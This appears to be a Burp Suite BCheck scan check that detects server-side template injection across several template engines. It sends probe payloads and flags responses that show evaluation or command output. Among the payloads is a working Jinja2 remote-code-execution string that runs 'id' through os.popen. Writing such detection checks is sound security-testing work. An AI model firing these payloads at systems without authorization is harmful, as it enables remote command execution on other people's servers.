metadata:
    language: v2-beta
    name: "SSTI - Multi Engine Detection with WAF Bypass"
    description: "Tests for SSTI across Jinja2, Twig, Freemarker, Velocity, Pebble, Smarty, Mako"
    author: "BCheck Arsenal"
    tags: "ssti", "rce", "waf-bypass"

run for each:
    payload = "{{7*7}}",
        "${7*7}",
        "#{7*7}",
        "<%= 7*7 %>",
        "{{7*'7'}}",
        "${{7*7}}",
        "{{request.__class__.__mro__[2].__subclasses__()}}",
        "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"

given insertion point then
    send payload:
        replacing: {payload}

    if {latest.response} matches "49" then
        report issue:
            severity: high
            confidence: firm
            detail: "Server-side template injection detected. Mathematical expression evaluated server-side."
            remediation: "Never pass user input into template strings. Use sandboxed template engines."
    end if

    if {latest.response} matches "(uid=|subprocess|catch_warnings|Popen)" then
        report issue:
            severity: high
            confidence: certain
            detail: "Jinja2 SSTI with RCE detected."
            remediation: "Use Jinja2 SandboxedEnvironment. Never render user input as template code."
    end if
